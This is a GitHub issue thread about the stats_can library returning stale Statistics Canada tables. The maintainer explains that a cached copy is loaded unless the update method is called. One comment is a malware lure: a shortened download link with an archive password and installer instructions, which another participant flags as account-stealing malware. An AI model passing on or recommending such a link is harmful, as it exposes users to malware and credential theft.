### ISSUE TITLE
stats-can not pulling latest data

### ISSUE THREAD

**Issue by jackhere-lab** [ianepreston/stats_can#522]
I have been using the stats-can library for a few years and just mounted the latest library (2.7.4, released July 2024) to my Databricks cluster.  

Recently I could load the library and get the latest data tables for releases like GDP, the consumer price index and retail sales among others.  

I tried pulling the table for e-commerce sales, it's only pulling to May 2024 (when June 2024 data should be included, table: 20-10-0056-01).  For monthly GDP by industry data to May 2024 are published on the site but the library is only pulling to April 2024 (table 36-10-0104-01).  

Any idea what is going on?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by jackhere-lab** [comment]
I have not loaded it...the response was too quick.

**Comment by ianepreston** [comment]
Thanks @caineblood for the comment. Looks like GitHub spam filters removed the egregious comment so I've removed the discussion to keep the thread clean.

@jackhere-lab can you post a snippet of how you're calling the api? Which methods are you using? I haven't released any changes to the package logic recently so I'd have to know more about your specific implementation to advise.

**Comment by jackhere-lab** [comment]
When I use the stat-can library, I mount to my cluster:

![image](https://github.com/user-attachments/assets/96505dc2-b023-4bc1-ab48-e51b844a3c0d)

Then I import libraries for pulling specific tables to get the tables I want:
![image](https://github.com/user-attachments/assets/8198b64d-736c-4163-b13c-6bb522e75005)

![image](https://github.com/user-attachments/assets/097e41ea-0df9-4dd0-84d4-92b2562543c7)

Retail sales are only pulling to May 2024 when actuals are now available to June 2024:

![image](https://github.com/user-attachments/assets/13b1c780-9f5f-4d5f-97e0-cb2253add47f)

![image](https://github.com/user-attachments/assets/079b48b9-4bd6-42e0-b6b4-6d156da13098)

**Comment by ianepreston** [comment]
Table to df will load a previously downloaded copy of a table. You need to call the update method on the stats can api object to pull in fresh tables.
